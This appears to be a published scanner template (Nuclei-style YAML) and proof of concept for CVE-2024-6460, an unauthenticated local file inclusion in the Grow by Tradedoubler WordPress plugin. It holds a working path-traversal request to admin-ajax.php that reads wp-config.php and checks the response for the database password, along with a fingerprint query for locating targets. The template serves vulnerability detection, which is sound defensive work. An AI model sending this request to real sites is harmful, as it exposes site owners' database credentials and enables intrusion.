The Grow by Tradedoubler WordPress plugin through version 2.0.21 is vulnerable to Local File Inclusion via the component parameter. This makes it possible for attackers to include and execute PHP files on the server, allowing the execution of any PHP code in those files.
PoC代码[已公开]
id: CVE-2024-6460
info:
name: WordPress Grow by Tradedoubler Plugin < 2.0.22 - Unauthenticated Local File Inclusion
author: ritikchaddha
severity: critical
description: |
The Grow by Tradedoubler WordPress plugin through version 2.0.21 is vulnerable to Local File Inclusion via the component parameter. This makes it possible for attackers to include and execute PHP files on the server, allowing the execution of any PHP code in those files.
reference:
- https://wpscan.com/vulnerability/ba2f53e0-30be-4f37-91bc-5fa151f1eee7
- https://nvd.nist.gov/vuln/detail/CVE-2024-6460
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-6460
cwe-id: CWE-22
epss-score: 0.90307
epss-percentile: 0.9957
metadata:
max-request: 2
vendor: WordPress
product: tradedoubler-affiliate-tracker
fofa-query: body="wp-content/plugins/tradedoubler-affiliate-tracker/"
tags: cve,cve2024,wp,wordpress,wp-plugin,lfi,tradedoubler-affiliate-tracker,vuln
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
redirects: true
matchers:
- type: word
part: body
words:
- "tradedoubler-affiliate-tracker"
internal: true
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
action=tm_load_data&component=../../../../wp-config.php
matchers-condition: and
matchers:
- type: word
part: body
words:
- "DB_NAME"
- "DB_PASSWORD"
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022100c46807a62c61d6538894b9de2f5b044eab98796fd9f0dd76708b912e5723d21902202e024fdf55d705f8bb6cf5c10094085ef7c39585afa27107e9634adca45853a5:922c64590222798bb761d5b6d8e72950